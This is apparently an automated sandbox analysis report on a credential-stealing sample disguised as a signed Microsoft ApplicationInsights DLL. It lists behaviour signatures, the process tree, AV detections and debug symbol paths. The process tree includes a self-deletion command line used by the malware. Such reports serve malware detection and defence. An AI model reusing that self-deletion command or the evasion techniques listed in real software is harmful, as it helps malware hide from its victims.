Play interactive tour

Edit tour

Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Sample Name:	Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Analysis ID:	482276
MD5:	14e351015c5d632f888dbcac03871fae
SHA1:	b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256:	977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
Tags:	exeOuterJoinSrlsigned
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	47
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Self deletion via cmd delete

.NET source code contains very large array initializations

Contains functionality to detect sleep reduction / modifications

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

PE file contains more sections than normal

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Microsoft.ApplicationInsights.PersistenceChannel.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' MD5: 14E351015C5D632F888DBCAC03871FAE)

Microsoft.ApplicationInsights.PersistenceChannel.exe (PID: 6340 cmdline: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe MD5: 14E351015C5D632F888DBCAC03871FAE)

cmd.exe (PID: 2216 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5624 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

WerFault.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Virustotal: Detection: 40%			Perma Link
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	ReversingLabs: Detection: 28%

Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack	Avira: Label: TR/Patched.Ren.Gen

Cryptography:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004062D0 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_004062D0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00406230 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00406230
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00405F50 CryptUnprotectData,	2_2_00405F50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00406560 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	2_2_00406560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00403BE0 memset,CryptStringToBinaryA,CryptStringToBinaryA,	2_2_00403BE0

Compliance:

Uses 32bit PE files

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

PE / OLE file has a valid certificate

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Spreading:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00401000
